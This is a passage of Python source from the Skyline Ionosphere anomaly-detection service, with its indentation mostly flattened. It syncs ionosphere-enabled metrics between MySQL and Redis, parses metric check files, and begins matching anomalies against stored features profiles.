logger.error('error :: could not get a MySQL engine for ionosphere_enabled_metrics')
return False
if not engine:
logger.error('error :: MySQL engine not obtained for ionosphere_enabled_metrics')
return False
# Determine the metrics that have ionosphere_enabled
# @added 20170103 - Task #1658: Patterning Skyline Ionosphere
        # TODO: We need 2 sets not just ionosphere.unique_metrics otherwise
        # if a metric is switched from Analyzer to Mirage all matched
        # anomalies will be sent to Ionosphere even if there is no features
        # profile at the specified duration.
# ionosphere.analyzer.unique_metrics (at FULL_DURATION)
# ionosphere.mirage.unique_metrics (NOT at FULL_DURATION)
# @modified 20170108 - Feature #1852: Ionosphere - features_profile matched graphite graphs
# Yes those ^^ are needed, MySQL join?
ionosphere_enabled_metrics = []
ionosphere_metrics_count = 0
query_ok = False
try:
stmt = 'select metric from metrics where ionosphere_enabled=1'
connection = engine.connect()
for row in engine.execute(stmt):
metric_basename = row['metric']
metric_name = '%s%s' % (str(settings.FULL_NAMESPACE), str(metric_basename))
ionosphere_enabled_metrics.append(metric_name)
connection.close()
query_ok = True
except:
logger.error(traceback.format_exc())
logger.error('error :: could not determine ionosphere_enabled metrics from the DB to manage ionosphere.unique_metrics Redis set')
ionosphere_metrics_count = len(ionosphere_enabled_metrics)
logger.info('db has %s ionosphere_enabled metrics' % (str(ionosphere_metrics_count)))
if manage_ionosphere_unique_metrics:
# Testing the query was fine and Ionosphere metrics can go to 0 if
# all were disabled
if query_ok:
manage_ionosphere_unique_metrics = True
else:
manage_ionosphere_unique_metrics = False
if manage_ionosphere_unique_metrics:
for metric_name in ionosphere_enabled_metrics:
try:
self.redis_conn.sadd('ionosphere.new_unique_metrics', metric_name)
# logger.info('added %s to ionosphere.new_unique_metrics Redis set' % metric_name)
except:
logger.error(traceback.format_exc())
logger.info('error :: failed to add %s to ionosphere.new_unique_metrics Redis set' % metric_name)
try:
self.redis_conn.setex('ionosphere.manage_ionosphere_unique_metrics', 300, time())
except:
logger.error('error :: failed to set key :: ionosphere.manage_ionosphere_unique_metrics')
try:
logger.info('replacing Redis ionosphere.unique_metrics via rename of ionosphere.new_unique_metrics')
self.redis_conn.rename('ionosphere.new_unique_metrics', 'ionosphere.unique_metrics')
manage_ionosphere_unique_metrics = False
ionosphere_unique_metrics = []
except Exception as e:
                logger.error('error :: could not rename Redis set ionosphere.new_unique_metrics to ionosphere.unique_metrics: %s' % str(e))
try:
self.redis_conn.setex('ionosphere.manage_ionosphere_unique_metrics', 300, time())
except:
logger.error('error :: failed to set key :: ionosphere.manage_ionosphere_unique_metrics')
redis_ionosphere_unique_metrics = []
try:
# ionosphere_unique_metrics = list(self.redis_conn.smembers('ionosphere.unique_metrics'))
redis_ionosphere_unique_metrics = self.redis_conn.smembers('ionosphere.unique_metrics')
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to get ionosphere.unique_metrics from Redis')
# ionosphere_unique_metrics = []
if redis_ionosphere_unique_metrics is not None:
ionosphere_unique_metrics = list(redis_ionosphere_unique_metrics)
ionosphere_unique_metrics_count = len(ionosphere_unique_metrics)
logger.info('the new Redis ionosphere.unique_metrics set has %s metrics' % (str(ionosphere_unique_metrics_count)))
else:
logger.info('Redis ionosphere.unique_metrics unknown setting to []')
ionosphere_unique_metrics = []
if engine:
try:
engine.dispose()
except:
logger.error(traceback.format_exc())
logger.error('error :: calling engine.dispose()')
return True
# @added 20161230 - Feature #1830: Ionosphere alerts
# Bug #1460: panorama check file fails
# Panorama check file fails #24
# Get rid of the skyline_functions imp as imp is deprecated in py3 anyway
def new_load_metric_vars(self, metric_vars_file):
"""
Load the metric variables for a check from a metric check variables file
:param metric_vars_file: the path and filename to the metric variables files
:type metric_vars_file: str
:return: the metric_vars list or ``False``
:rtype: list
"""
if os.path.isfile(metric_vars_file):
logger.info(
'loading metric variables from metric_check_file - %s' % (
str(metric_vars_file)))
else:
logger.error(
'error :: loading metric variables from metric_check_file - file not found - %s' % (
str(metric_vars_file)))
return False
metric_vars = []
with open(metric_vars_file) as f:
for line in f:
no_new_line = line.replace('\n', '')
no_equal_line = no_new_line.replace(' = ', ',')
array = str(no_equal_line.split(',', 1))
add_line = literal_eval(array)
metric_vars.append(add_line)
string_keys = ['metric', 'anomaly_dir', 'added_by', 'app', 'source']
float_keys = ['value']
# @modified 20170127 - Feature #1886: Ionosphere learn - child like parent with evolutionary maturity
# Added ionosphere_parent_id, always zero from Analyzer and Mirage
int_keys = [
'from_timestamp', 'metric_timestamp', 'added_at', 'full_duration',
'ionosphere_parent_id']
array_keys = ['algorithms', 'triggered_algorithms']
boolean_keys = ['graphite_metric', 'run_crucible_tests']
metric_vars_array = []
for var_array in metric_vars:
key = None
value = None
if var_array[0] in string_keys:
key = var_array[0]
value_str = str(var_array[1]).replace("'", '')
value = str(value_str)
if var_array[0] == 'metric':
metric = value
if var_array[0] in float_keys:
key = var_array[0]
value_str = str(var_array[1]).replace("'", '')
value = float(value_str)
if var_array[0] in int_keys:
key = var_array[0]
value_str = str(var_array[1]).replace("'", '')
value = int(value_str)
if var_array[0] in array_keys:
key = var_array[0]
value = literal_eval(str(var_array[1]))
if var_array[0] in boolean_keys:
key = var_array[0]
if str(var_array[1]) == 'True':
value = True
else:
value = False
if key:
metric_vars_array.append([key, value])
if len(metric_vars_array) == 0:
logger.error(
                'error :: loading metric variables - none found in %s' % (
                    str(metric_vars_file)))
return False
logger.info('debug :: metric_vars for %s' % str(metric))
logger.info('debug :: %s' % str(metric_vars_array))
return metric_vars_array
# @added 20170109 - Feature #1854: Ionosphere learn
    # Added the spawn_learn_process after determining it is not fit to bolt learn
    # inside of ionosphere.py in its entirety; no point in more conditional nesting
    # and bulking up ionosphere.py with more learn parameters to spin_process etc.
    # ionosphere.py works, as good as it gets, so it was extended with learn.py. This
    # uses the same no memory leak pattern that was adopted for smtp_alerts.
def spawn_learn_process(self, i, timestamp):
"""
Spawn a process to learn.
This is used for Ionosphere to learn if anomalous metrics remain
        anomalous over time, as the resolution decreases. It follows the
        multiprocessing methodology that was introduced in Analyzer and Mirage:
        the process objects are cleared down and the learn processes cannot
        create memory leaks, because each process always terminates or is
        terminated, which prevents any memory leaks in the parent.
"""
# @modified 20170117 - Feature #1854: Ionosphere learn - generations
# Renamed the function from simple learn to the meme it has become
# learn(timestamp)
ionosphere_learn(timestamp)
def spin_process(self, i, metric_check_file):
"""
Assign an anomalous metric to check against features profiles.
:param i: python process id
:param metric_check_file: full path to the metric check file
:type i: object
:type metric_check_file: str
:return: int
:rtype: int or boolean
"""
def get_an_engine():
try:
engine, log_msg, trace = get_engine(skyline_app)
return engine, log_msg, trace
except:
logger.error(traceback.format_exc())
log_msg = 'error :: failed to get MySQL engine in spin_process'
logger.error('error :: failed to get MySQL engine in spin_process')
return None, log_msg, trace
def engine_disposal(engine):
if engine:
try:
engine.dispose()
except:
logger.error(traceback.format_exc())
logger.error('error :: calling engine.dispose()')
return
child_process_pid = os.getpid()
logger.info('child_process_pid - %s' % str(child_process_pid))
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: processing metric check - %s' % metric_check_file)
if not os.path.isfile(str(metric_check_file)):
logger.error('error :: file not found - metric_check_file - %s' % (str(metric_check_file)))
return
check_file_name = os.path.basename(str(metric_check_file))
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: check_file_name - %s' % check_file_name)
check_file_timestamp = check_file_name.split('.', 1)[0]
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: check_file_timestamp - %s' % str(check_file_timestamp))
check_file_metricname_txt = check_file_name.split('.', 1)[1]
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: check_file_metricname_txt - %s' % check_file_metricname_txt)
check_file_metricname = check_file_metricname_txt.replace('.txt', '')
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: check_file_metricname - %s' % check_file_metricname)
check_file_metricname_dir = check_file_metricname.replace('.', '/')
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: check_file_metricname_dir - %s' % check_file_metricname_dir)
metric_failed_check_dir = '%s/%s/%s' % (failed_checks_dir, check_file_metricname_dir, check_file_timestamp)
failed_check_file = '%s/%s' % (metric_failed_check_dir, check_file_name)
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: failed_check_file - %s' % failed_check_file)
# @added 20170307 - Feature #1960: ionosphere_layers - ionosphere_check_cache_key
# This Redis cache key check was added to prevent Ionosphere from
# running riot on checks if for some reason the check_file is not
# removed which happens if some exception is not handled as found out
# again during yesterday's development of run_layer_algorithms. It was
# a good reminder of how fast Skyline can iterate.
ionosphere_check_cache_key = 'ionosphere.check.%s' % check_file_name
check_done = False
try:
check_done = self.redis_conn.get(ionosphere_check_cache_key)
except Exception as e:
logger.error('error :: could not query Redis for cache_key: %s' % e)
if not check_done:
logger.info('check done check - no check cache key - %s' % ionosphere_check_cache_key)
else:
# @modified 20181113 - Task #2680: Remove Ionosphere check files is key exists
# This was here for initially debugging, no longer needed
# logger.error('error :: a check cache key exists - %s' % ionosphere_check_cache_key)
# logger.error('error :: failing check to prevent multiple iterations over this check')
# fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
logger.info('a check cache key exists - %s' % (ionosphere_check_cache_key))
logger.info('to prevent multiple iterations over this check removing %s' % (
str(metric_check_file)))
self.remove_metric_check_file(str(metric_check_file))
return
try:
check_process_start = int(time())
self.redis_conn.setex(
ionosphere_check_cache_key, 300, [check_process_start])
logger.info(
'added Redis check key - %s' % (ionosphere_check_cache_key))
except:
logger.error(traceback.format_exc())
logger.error(
'error :: failed to add Redis check key - %s' % (ionosphere_check_cache_key))
logger.error('error :: failing check to prevent multiple iterations over this check')
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
try:
# Load and validate metric variables
# @modified 20161231 - Feature #1830: Ionosphere alerts
# Bug #1460: panorama check file fails
# Panorama check file fails #24
# Get rid of the skyline_functions imp as imp is deprecated in py3 anyway
# Use def new_load_metric_vars(self, metric_vars_file):
# metric_vars = load_metric_vars(skyline_app, str(metric_check_file))
metric_vars_array = self.new_load_metric_vars(str(metric_check_file))
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to load metric variables from check file - %s' % (metric_check_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
# Test metric variables
        # We use a pythonic methodology to test if the variables are defined;
        # this ensures that if any of the variables are not set for some reason
        # we can handle unexpected data or situations gracefully and try to
        # ensure that the process does not hang.
metric = None
try:
# metric_vars.metric
# metric = str(metric_vars.metric)
key = 'metric'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
metric = str(value_list[0])
base_name = metric
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - metric - %s' % metric)
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to read metric variable from check file - %s' % (metric_check_file))
metric = None
if not metric:
logger.error('error :: failed to load metric variable from check file - %s' % (metric_check_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
value = None
try:
# metric_vars.value
# value = str(metric_vars.value)
key = 'value'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
value = float(value_list[0])
anomalous_value = value
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - value - %s' % str(value))
except:
logger.error('error :: failed to read value variable from check file - %s' % (metric_check_file))
value = None
if not value:
# @modified 20181119 - Bug #2708: Failing to load metric vars
if value == 0.0:
pass
else:
logger.error('error :: failed to load value variable from check file - %s' % (metric_check_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
from_timestamp = None
try:
# metric_vars.from_timestamp
# from_timestamp = str(metric_vars.from_timestamp)
key = 'from_timestamp'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
from_timestamp = int(value_list[0])
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - from_timestamp - %s' % str(from_timestamp))
except:
# @added 20160822 - Bug #1460: panorama check file fails
# Added exception handling here
logger.info(traceback.format_exc())
logger.error('error :: failed to read from_timestamp variable from check file - %s' % (metric_check_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
if not from_timestamp:
logger.error('error :: failed to load from_timestamp variable from check file - %s' % (metric_check_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
metric_timestamp = None
try:
# metric_vars.metric_timestamp
# metric_timestamp = str(metric_vars.metric_timestamp)
key = 'metric_timestamp'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
metric_timestamp = int(value_list[0])
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - metric_timestamp - %s' % str(metric_timestamp))
except:
logger.error('error :: failed to read metric_timestamp variable from check file - %s' % (metric_check_file))
metric_timestamp = None
if not metric_timestamp:
logger.error('error :: failed to load metric_timestamp variable from check file - %s' % (metric_check_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
try:
# metric_vars.algorithms
# algorithms = metric_vars.algorithms
key = 'algorithms'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
algorithms = value_list[0]
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - algorithms - %s' % str(algorithms))
except:
logger.error('error :: failed to read algorithms variable from check file setting to all - %s' % (metric_check_file))
algorithms = 'all'
try:
# metric_vars.triggered_algorithms
# triggered_algorithms = metric_vars.triggered_algorithms
key = 'triggered_algorithms'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
triggered_algorithms = value_list[0]
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - triggered_algorithms - %s' % str(triggered_algorithms))
except:
logger.error('error :: failed to read triggered_algorithms variable from check file setting to all - %s' % (metric_check_file))
triggered_algorithms = 'all'
added_by = None
try:
# metric_vars.added_by
# added_by = str(metric_vars.added_by)
key = 'added_by'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
added_by = str(value_list[0])
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - added_by - %s' % added_by)
except:
logger.error('error :: failed to read added_by variable from check file - %s' % (metric_check_file))
added_by = None
if not added_by:
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
# @added 20170117 - Feature #1854: Ionosphere learn - generations
if str(added_by) == 'ionosphere_learn':
logger.info('debug :: metric variable - added_by - %s' % added_by)
try:
# metric_vars.added_at
# added_at = str(metric_vars.added_at)
key = 'added_at'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
added_at = int(value_list[0])
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - added_at - %s' % str(added_at))
except:
logger.error('error :: failed to read added_at variable from check file setting to all - %s' % (metric_check_file))
added_at = metric_timestamp
# @added 20161228 - Feature #1828: ionosphere - mirage Redis data features
# Added full_duration which needs to be recorded to allow Mirage metrics
# to be profiled on Redis timeseries data at FULL_DURATION
full_duration = None
try:
# metric_vars.full_duration
# full_duration = str(metric_vars.full_duration)
key = 'full_duration'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
full_duration = int(value_list[0])
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - full_duration - %s' % str(full_duration))
except:
logger.error('error :: failed to read full_duration variable from check file - %s' % (metric_check_file))
full_duration = None
if not full_duration:
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
# @added 20170127 - Feature #1886: Ionosphere learn - child like parent with evolutionary maturity
# Added ionosphere_parent_id, always zero from Analyzer and Mirage
ionosphere_parent_id = None
ionosphere_parent_id_determined = False
try:
key = 'ionosphere_parent_id'
value_list = [var_array[1] for var_array in metric_vars_array if var_array[0] == key]
ionosphere_parent_id = int(value_list[0])
ionosphere_parent_id_determined = True
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: metric variable - ionosphere_parent_id - %s' % str(ionosphere_parent_id))
except:
logger.error('error :: failed to read ionosphere_parent_id variable from check file - %s' % (metric_check_file))
ionosphere_parent_id = None
if not ionosphere_parent_id_determined:
logger.error('error :: failed to determine ionosphere_parent_id variable from check file - %s' % (metric_check_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
return
# @modified 20170116 - Feature #1854: Ionosphere learn
# Do not check the cache key or anomaly age if added by ionosphere_learn
if added_by != 'ionosphere_learn':
# @added 20170101 - Feature #1830: Ionosphere alerts
# Remove check file is an alert key exists
cache_key = 'ionosphere.%s.alert.%s.%s' % (added_by, metric_timestamp, base_name)
last_alert = False
try:
last_alert = self.redis_conn.get(cache_key)
except Exception as e:
logger.error('error :: could not query Redis for cache_key: %s' % e)
if not last_alert:
logger.info('debug :: no alert cache key - %s' % cache_key)
else:
logger.info('debug :: removing check - alert cache key exists - %s' % cache_key)
self.remove_metric_check_file(str(metric_check_file))
return
now = time()
anomaly_age = int(now) - int(metric_timestamp)
if anomaly_age > max_age_seconds:
logger.info(
'Ionosphere check max age exceeded - %s - %s seconds old, older than %s seconds discarding' % (
metric, str(anomaly_age), str(max_age_seconds)))
with open(metric_check_file, 'rt') as fr:
metric_check_file_contents = fr.readlines()
logger.info(
'debug :: metric check file contents\n%s' % (str(metric_check_file_contents)))
self.remove_metric_check_file(str(metric_check_file))
return
else:
logger.info('processing check_file for ionosphere_learn - %s' % str(metric_check_file))
# @added 20161222 - ionosphere should extract features for every anomaly
# check that is sent through and calculate a feature_profile ready for
# submission by the user if they so choose. Further ionosphere could
# make itself more useful by comparing any training data profiles to
# further anomalies, however the feature profiles for subsequent
# anomalies may be similar enough to match a few times and each a closer
# match to the next.
training_metric = False
metrics_id = None
metric_ionosphere_enabled = None
# @added 20170115 - Feature #1854: Ionosphere learn - generations
# Create the metrics_db_object so it is available to determine all
# the details of all features profiles for the metric, this has all
        # the generations values available in it. Here we go! Learn!
metrics_db_object = None
# @added 20170825 - Task #2132: Optimise Ionosphere DB usage
# Try memcache first
try:
engine
except:
engine = None
memcache_metrics_db_object = None
metrics_db_object_key = 'metrics_db_object.%s' % str(base_name)
memcache_metric_dict = None
if settings.MEMCACHE_ENABLED:
memcache_metric_dict = get_memcache_metric_object(skyline_app, base_name)
query_metric_table = True
if memcache_metric_dict:
query_metric_table = False
metrics_id = int(memcache_metric_dict['id'])
metric_ionosphere_enabled = int(memcache_metric_dict['ionosphere_enabled'])
metrics_db_object = memcache_metric_dict
if metric_ionosphere_enabled is not None:
training_metric = False
else:
training_metric = True
logger.info('using %s key data from memcache' % metrics_db_object_key)
# Check if the metric has ionosphere_enabled, if not remove the check
# file but not the data directory
# @modified 20161230 - Feature #1830: Ionosphere alerts
# Use SQLAlchemy method
# query = "SELECT ionosphere_enabled FROM metrics WHERE metric='%s'" % metric
# result = mysql_select(skyline_app, query)
# if str(result[0]) != '1':
# logger.info('Ionosphere not enabled on %s' % (metric))
# # @modified 20161222 - do not remove metric file until features
# # calculated
# # self.remove_metric_check_file(str(metric_check_file))
# # return
# training_metric = True
# @modified 20170825 - Task #2132: Optimise Ionosphere DB usage
# If no memcache data then MySQL query_metric_table
if query_metric_table:
try:
engine, log_msg, trace = get_an_engine()
logger.info(log_msg)
except:
logger.error(traceback.format_exc())
logger.error('error :: could not get a MySQL engine to determine ionosphere_enabled')
if not engine:
logger.error('error :: engine not obtained to determine ionosphere_enabled')
# Get the metrics_table metadata
metrics_table = None
try:
metrics_table, log_msg, trace = metrics_table_meta(skyline_app, engine)
logger.info('metrics_table OK for %s' % base_name)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to get metrics_table meta for %s' % base_name)
try:
connection = engine.connect()
# stmt = select([metrics_table.c.ionosphere_enabled]).where(metrics_table.c.metric == str(metric))
stmt = select([metrics_table]).where(metrics_table.c.metric == base_name)
result = connection.execute(stmt)
try:
result
except:
logger.error(traceback.format_exc())
logger.error('error :: got no result from MySQL from metrics table for - %s' % base_name)
row = result.fetchone()
# @added 20170825 - Task #2132: Optimise Ionosphere DB usage
# @modified - 20180524 - Task #2132: Optimise Ionosphere DB usage
# Feature #2378: Add redis auth to Skyline and rebrow
# Wrapped memcache_metrics_db_object, metrics_id,
# metric_ionosphere_enabled and metrics_db_object in if row
# as if row is None it can fail with:
# TypeError: 'NoneType' object is not iterable
# memcache_metrics_db_object = dict(row)
if row:
memcache_metrics_db_object = dict(row)
metrics_id = row['id']
metric_ionosphere_enabled = row['ionosphere_enabled']
# @added 20170115 - Feature #1854: Ionosphere learn - generations
# Create the metrics_db_object so it is available throughout
# Here we go! Learn!
metrics_db_object = row
else:
logger.info('could not determine metric id for %s' % base_name)
connection.close()
if metric_ionosphere_enabled is not None:
training_metric = False
else:
# @modified 20161222 - do not remove metric file until features
# calculated
# self.remove_metric_check_file(str(metric_check_file))
# return
training_metric = True
# self.training_metrics.append(base_name)
except:
logger.error(traceback.format_exc())
logger.error('error :: could not determine ionosphere_enabled from metrics table for - %s' % base_name)
metric_ionosphere_enabled = None
training_metric = True
# self.training_metrics.append(base_name)
# @added 20170825 - Task #2132: Optimise Ionosphere DB usage
# Add the metric db object data to memcache
if settings.MEMCACHE_ENABLED and query_metric_table:
try:
memcache_metric_dict = {}
                for k, v in memcache_metrics_db_object.items():  # items() works on both Python 2 and 3
key_name = str(k)
key_value = str(v)
memcache_metric_dict[key_name] = key_value
self.memcache_client.set(metrics_db_object_key, memcache_metric_dict, expire=3600)
logger.info('set the memcache key - %s' % metrics_db_object_key)
except:
                logger.error('error :: failed to set %s in memcache' % metrics_db_object_key)
try:
self.memcache_client.close()
except:
# @modified 20170913 - Task #2160: Test skyline with bandit
# pass
logger.error('error :: failed to close memcache_client')
# @added 20170116 - Feature #1854: Ionosphere learn - generations
# If this is added_by ionosphere_learn the id is only
# added if the use_full_duration_days features profile
# is less than max_generations as if it is at the max
# then a new features profile cannot be created from it
# even if it is a match.
metric_max_generations = None
if added_by == 'ionosphere_learn':
try:
metric_max_generations = int(metrics_db_object['max_generations'])
                logger.info('determining max_generations for ionosphere_learn check - %s - %s' % (str(metric_max_generations), base_name))
except:
logger.error(traceback.format_exc())
                logger.error('error :: ionosphere_learn check could not determine the metric max_generations from the metrics_db_object for %s' % base_name)
if not metric_max_generations:
                logger.error('error :: ionosphere_learn check cannot continue without max_generations for %s' % base_name)
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
if engine:
engine_disposal(engine)
return
# @added 20170108 - Feature #1830: Ionosphere alerts
# Only process smtp_alerter_metrics
if training_metric:
if base_name in self.ionosphere_non_smtp_alerter_metrics:
logger.error('error :: Ionosphere does not handle metrics that do not have a smtp alert context removing check for %s' % (base_name))
self.remove_metric_check_file(str(metric_check_file))
if engine:
engine_disposal(engine)
return
else:
self.training_metrics.append(base_name)
logger.info(
'ionosphere_enabled is %s for metric id %s - %s' % (
str(metric_ionosphere_enabled), str(metrics_id),
base_name))
if training_metric:
logger.info('Ionosphere is not enabled on %s' % (base_name))
else:
logger.info('Ionosphere is enabled on %s' % (base_name))
# @added 20161210 - Branch #922: ionosphere
# Task #1658: Patterning Skyline Ionosphere
# Only continue if there is a training data json timeseries file
metric_timeseries_dir = base_name.replace('.', '/')
# @modified 20170115 - Feature #1854: Ionosphere learn
# Allowing the bifurcation of the metric_training_data_dir based on
# whether added_by is ionosphere_learn or not, this allows Ionosphere to
# be brought online to start evaluating the learn features profiles at
# 30 days or whatever the learn_full_duration_days is for the metric
# that is being automatically learnt uses these fuller duration features
# to determine if a new training data set has been created for an
# ionosphere_enabled metric. Here Ionosphere starts to try and get
# clever, let us hope not too clever, but this is where the
# max_percent_diff_from_origin and max_generations comes in. So ...
# here we go, a really "Crazy feedback loop" @astanway :) I would say
# that this is going to be way more useful than the last referenced one
# in https://github.com/etsy/skyline/pull/90#r13592782 ;) This is it
# 20170115202500 UTC Ionosphere really is now really going to begin.
# Here we go! Learn!
# metric_training_data_dir = '%s/%s/%s' % (
# settings.IONOSPHERE_DATA_FOLDER, metric_timestamp,
# metric_timeseries_dir)
if added_by != 'ionosphere_learn':
metric_training_data_dir = '%s/%s/%s' % (
settings.IONOSPHERE_DATA_FOLDER, metric_timestamp,
metric_timeseries_dir)
else:
# Here we go! Learn you bugger! SUCH A BIG THANKS TO tsfresh!
# And flowjob and The White Stripes, @matzhouse, her and the Dude.
metric_training_data_dir = '%s/%s/%s' % (
settings.IONOSPHERE_LEARN_FOLDER, metric_timestamp,
metric_timeseries_dir)
anomaly_json = '%s/%s.json' % (metric_training_data_dir, base_name)
if os.path.isfile(anomaly_json):
logger.info('training data ts json available - %s' % (anomaly_json))
else:
logger.error('error :: training data ts json was not found - %s' % (anomaly_json))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
if engine:
engine_disposal(engine)
return
# @added 20161228 - Feature #1828: ionosphere - mirage Redis data features
# The timeseries full_duration needs to be recorded to allow Mirage metrics to
# be profiled on Redis timeseries data at FULL_DURATION
# e.g. mirage.redis.24h.json
if training_metric:
logger.info('training metric - %s' % (base_name))
if added_by == 'mirage':
logger.info('checking training data Redis json is available')
# Always calculate features for both the SECOND_ORDER_RESOLUTION_SECONDS
# timeseries data and the FULL_DURATION Redis timeseries data.
# It is always preferable to create a features profile on a FULL_DURATION
# data set, unless the user is flagging the actual Mirage timeseries as
# not anomalous. In the Mirage context the not anomalous may often be more
# "visibile" in the FULL_DURATION view and if so should be matched on the
# FULL_DURATION timeseries data, even if it is a Mirage metric.
# Features profiles can be created for a Mirage metric on both the
# FULL_DURATION and the SECOND_ORDER_RESOLUTION_SECONDS data sets, however
# only one should be needed.
# A features profile should always be created at the highest resolution
# possible, FULL_DURATION data, wherever possible.
try:
full_duration_hours = str(int(settings.FULL_DURATION / 3600))
redis_anomaly_json = '%s/%s.mirage.redis.%sh.json' % (metric_training_data_dir, base_name, full_duration_hours)
if os.path.isfile(redis_anomaly_json):
logger.info('training data Redis full duration ts json available - %s' % (redis_anomaly_json))
else:
                        logger.info('no training data Redis full duration json was found - %s' % (redis_anomaly_json))
except:
logger.error(traceback.format_exc())
logger.error('error :: training data Redis full duration json was not found - %s' % (redis_anomaly_json))
# @added 20161209 - Branch #922: ionosphere
# Task #1658: Patterning Skyline Ionosphere
# Use SQLAlchemy, mysql.connector is still upstairs ^^ but starting the
# move to SQLAlchemy now that all the webapp Ionosphere SQLAlchemy
        # patterns work and the database layout is defined we can begin on the
# data side. Ionosphere was put together backwards, like tsfresh was
# learnt. It was the people input first here in many ways, which is
        # exactly how it was supposed to be.
# This is now the Ionosphere meat.
# Get a MySQL engine only if not training_metric
if not training_metric:
if not metrics_id:
logger.error('error :: metric id not known')
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
if engine:
engine_disposal(engine)
return False
# @added 20170101 - Feature #1836: ionosphere - local features profiles disk cache
# Cache fp ids for 300 seconds?
# @added 20170804 - Bug #2130: MySQL - Aborted_clients
# Set a conditional here to only get_an_engine if no engine, this
# is probably responsible for the Aborted_clients, as it would have
# left the accquired engine orphaned
# Testing on skyline-dev-3-40g-gra1 Fri Aug 4 16:08:14 UTC 2017
if not engine:
logger.info('getting MySQL engine')
try:
engine, log_msg, trace = get_an_engine()
logger.info(log_msg)
except:
logger.error(traceback.format_exc())
logger.error('error :: could not get a MySQL engine to get fp_ids')
if not engine:
logger.error('error :: engine not obtained to get fp_ids')
try:
ionosphere_table, log_msg, trace = ionosphere_table_meta(skyline_app, engine)
logger.info(log_msg)
logger.info('ionosphere_table OK')
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to get ionosphere_table meta for %s' % base_name)
# Determine the fp_ids that exist for the metric
fp_ids = []
fp_ids_found = False
# @added 20170108 - Feature #1842: Ionosphere - Graphite now graphs
# Added all_fp_ids so that we can handle multiple durations and not
# error and reminds me of the needed metrics by FULL_DURATION
# ionosphere.analyzer.unique_metrics (at FULL_DURATION)
# ionosphere.mirage.unique_metrics (NOT at FULL_DURATION)
all_fp_ids = []
# @added 20170115 - Feature #1854: Ionosphere learn - generations
# Create the fp_ids_db_object so it is available to determine all
# the details of all features profiles for the metric, this has all
            # the generations values available in it.
# Here we go! Learn!
# @modified 20170308 - Feature #1960: ionosphere_layers
# Not currently used - fp_ids_db_object
# fp_ids_db_object = None
# @added 20170306 - Feature #1960: ionosphere_layers
# Here we go, let us TEACH you properly.
# Set result to None here to fix a interpolation error below
result = None
fp_layers_ids = []
fp_layers_present = False
try:
connection = engine.connect()
            # @modified 20180715 - Task #2446: Optimize Ionosphere
# Branch #2270: luminosity
# Order by the latest features profile, this also results in the
# layers ids being ordered by latest too.
# stmt = select([ionosphere_table]).where(ionosphere_table.c.metric_id == metrics_id)
stmt = select([ionosphere_table]).where(ionosphere_table.c.metric_id == metrics_id).order_by(desc(ionosphere_table.c.id))
result = connection.execute(stmt)
for row in result:
# @added 20170116 - Feature #1854: Ionosphere learn
# if a features profiles is not enabled or deleted, skip it
if row['enabled'] != 1:
continue
if row['deleted'] == 1:
continue
fp_id = row['id']
# @added 20170306 - Feature #1960: ionosphere_layers
# Here we go, let us TEACH you properly
fp_layers_id = int(row['layers_id'])
if fp_layers_id > 0:
fp_layers_present = True
# @modified 20181013 - Feature #2430: Ionosphere validate learnt features profiles page
# Only add the fp_layers_id if > 0
# fp_layers_ids.append(fp_layers_id)
if fp_layers_id > 0:
if fp_layers_id not in fp_layers_ids:
fp_layers_ids.append(fp_layers_id)
# @added 20170108 - Feature #1842: Ionosphere - Graphite now graphs
# Added all_fp_ids
all_fp_ids.append(int(fp_id))
if int(row['full_duration']) == int(full_duration):
# @modified 20170116 - Feature #1854: Ionosphere learn - generations
# Handle ionosphere_learn
if added_by != 'ionosphere_learn':
fp_ids.append(int(fp_id))
